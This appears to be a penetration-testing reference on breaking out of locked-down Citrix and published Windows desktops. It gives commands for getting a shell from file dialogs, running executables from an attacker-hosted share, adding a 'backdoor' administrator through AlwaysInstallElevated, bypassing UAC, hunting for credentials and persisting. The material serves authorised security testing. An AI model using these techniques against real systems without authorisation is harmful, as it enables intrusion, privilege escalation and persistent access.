Skip to main content

Citrix and Published Desktop Breakout

Many organizations deliver remote access through application and desktop virtualization: Citrix Virtual Apps and Desktops, Microsoft Terminal Services / RemoteApp, AWS AppStream, CyberArk PSM, VMware Horizon, and dedicated kiosks. To limit the impact of a compromised account, the published desktop is locked down, but a restricted desktop can almost always be escaped.

This note covers the general breakout method plus a broad set of techniques so it can serve as an engagement reference, not just a single walked path.

The method has three stages:

  1. Gain access to a dialog box.
  2. Exploit the dialog box to achieve command execution.
  3. Escalate privileges.

In lightly hardened environments there may be a shortcut to cmd.exe in the Start Menu. In a locked-down environment, searching the Start Menu for cmd.exe or powershell.exe returns nothing, and opening C:\Windows\System32 in File Explorer is blocked by policy. Getting a command prompt here is the key milestone: it gives broad control of the operating system and the information needed to escalate.


Obtaining the session​

Published desktops launch from a web portal. After login, selecting the desktop downloads a launch file (an .ica file for Citrix, an .rdp file for RemoteApp/Terminal Services), which the client opens to connect to the restricted environment.


Stage 1: harvest a dialog box​

Group Policy restricts File Explorer and the shell, not every Win32 dialog. A dialog box is a genuine Explorer window with full filesystem and UNC access. Collect dialog sources from every published application:

  • Open, Open File, Save, Save As, Browse, Choose folder.
  • Import, Export.
  • Print, Print preview, Print to file, printer properties.
  • Help, F1, About, and any hyperlink in an error dialog.
  • Search, Scan.

Common applications that expose these: MS Paint (File, then Open), Notepad, WordPad, document and image viewers, PDF viewers, browser file dialogs, and any line of business app with a file picker.

From a dialog, entering an absolute path or a UNC path in the File name field (with File type set to All Files) reaches otherwise restricted locations:

\\127.0.0.1\c$\Users\<user>

Stage 2: command execution​

Once you have a dialog or any execution primitive, use the easiest available path.

Run a native executable​

Type an executable path into the File name field and press Enter:

C:\Windows\System32\cmd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Then Shift+Right-click a folder and choose Open command window here if the dialog is a real Explorer window.

Run a binary directly from a network location​

Open a UNC or WebDAV path in the dialog and Open an executable in place:

\\10.10.10.10\share\pwn.exe

A minimal launcher:

#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}

File association execution​

If the extension is associated with an interpreter, opening the file runs code:

  • .bat, .cmd
  • .vbs, .vbe, .js, .jse, .wsf
  • .hta (mshta.exe)
  • .ps1
  • .lnk, .url, .scf
  • .msc, .cpl
  • .msi (also a privilege escalation path under AlwaysInstallElevated)

A one line launcher:

cmd

Save it as evil.bat and run it.

Shortcut modification or creation​

Right-click a shortcut, Properties, set Target to C:\Windows\System32\cmd.exe, then run it. To create one:

$s = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:USERPROFILE\Desktop\s.lnk")
$s.TargetPath = "C:\Windows\System32\cmd.exe"
$s.Save()

Protocol and shell handlers​

Useful when you can type a URL or path:

  • mshta:, search-ms:, ms-msdt:, msdt:
  • file://, shell:startup, shell:common startup, shell:AppsFolder
  • ms-settings: and Control Panel URIs

Task Scheduler and Control Panel​

taskschd.msc can create a task that runs an arbitrary command as the current user. Control Panel (Programs and Features, or an applet) can run an installer.

Alternate file explorers and registry editors​

When File Explorer is heavily restricted, portable file managers and registry editors ignore the policy:

  • File managers: Explorer++, Q-Dir.
  • Registry editors: SmallRegistryEditor, Uberregedit, SimpleRegedit.

These are portable and run without installation, so they are easy to bring in over a share and use to copy files or edit the registry.

Office macros and templates​

If Microsoft Office is reachable, macros, DDE, or template injection can run commands. Availability depends on the environment.


File transfer from the restricted session​

  • SMB share browsed via UNC:
smbserver.py -smb2support share $(pwd)
  • WebDAV share (host with wsgidav or similar) opened from the dialog or browser.
  • FTP URL opened from the dialog or browser.
  • Browser downloads from an HTTP(S) server you control.
  • Clipboard where allowed.

Stage 3: escalate privileges​

Enumerate with WinPEAS and PowerUp. Two findings are common in published desktops.

AlwaysInstallElevated​

Check both hives:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both are 0x1, create and run an MSI that adds an administrator:

Import-Module .\PowerUp.ps1
Write-UserAddMSI

Run UserAdd.msi, create the user in Administrators (the password must meet complexity policy), then:

runas /user:backdoor cmd

UAC bypass​

Membership in Administrators is not enough while UAC is active. Accessing C:\Users\Administrator returns Access is denied until you hold an elevated token. Bypass scripts work:

Import-Module .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep

Other public UAC bypass methods to try (many are automated by UACME): fodhelper, computerdefaults, sdclt, eventvwr, slui, sysprep, and auto-elevating binaries. Confirm elevation with whoami /all or whoami /priv.

Other escalation paths​

  • Service misconfiguration and unquoted service paths.
  • Writable service, scheduled task or startup directories.
  • Saved credentials in scripts, config files, and %APPDATA%.
  • Kerberos ticket and credential material in the session (see credential-access, lateral-movement).
  • Missing DLL on PATH, hijackable by a top directory (see dll-injection, windows-privesc).

Credential and data hunting​

With a shell, look for:

  • Scripts and batch files containing credentials or connection strings.
  • Config, .ini, .config, .xml, .json files with stored secrets.
  • Browser saved logins and Credentials in the Windows Credential Manager.
  • Unattended install files (unattend.xml, sysprep.inf).
  • PowerShell history and Export-Clixml files.

See credential-access for tooling.


Persistence after a breakout​

  • A shortcut in the Startup folder or shell:startup.
  • A scheduled task that runs your payload.
  • A Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
  • A modified DLL on PATH (see dll-injection).

Systematic breakout checklist (fuzzing an environment)​

  1. Enumerate every published or allowed application and build a dialog inventory.
  2. In each dialog File name field, test absolute path, UNC path, executable path, protocol URI, shell: URI, and trailing dots or spaces.
  3. Test every file extension association by dropping a harmless file and opening it.
  4. Test Start Menu search with partial names.
  5. Test right-click context menus, including Shift+Right-click variants.
  6. Test keyboard shortcuts: F1, Ctrl+O, Ctrl+S, Ctrl+P, Alt, Shift+F10.
  7. Test Print dialogs and Print to file.
  8. Test Help links and any error dialog links.
  9. Test the browser: address bar paths and downloads.
  10. Test writable directories on PATH for exe and DLL hijacking.
  11. Repeat per application, since restrictions often differ between published apps.

References​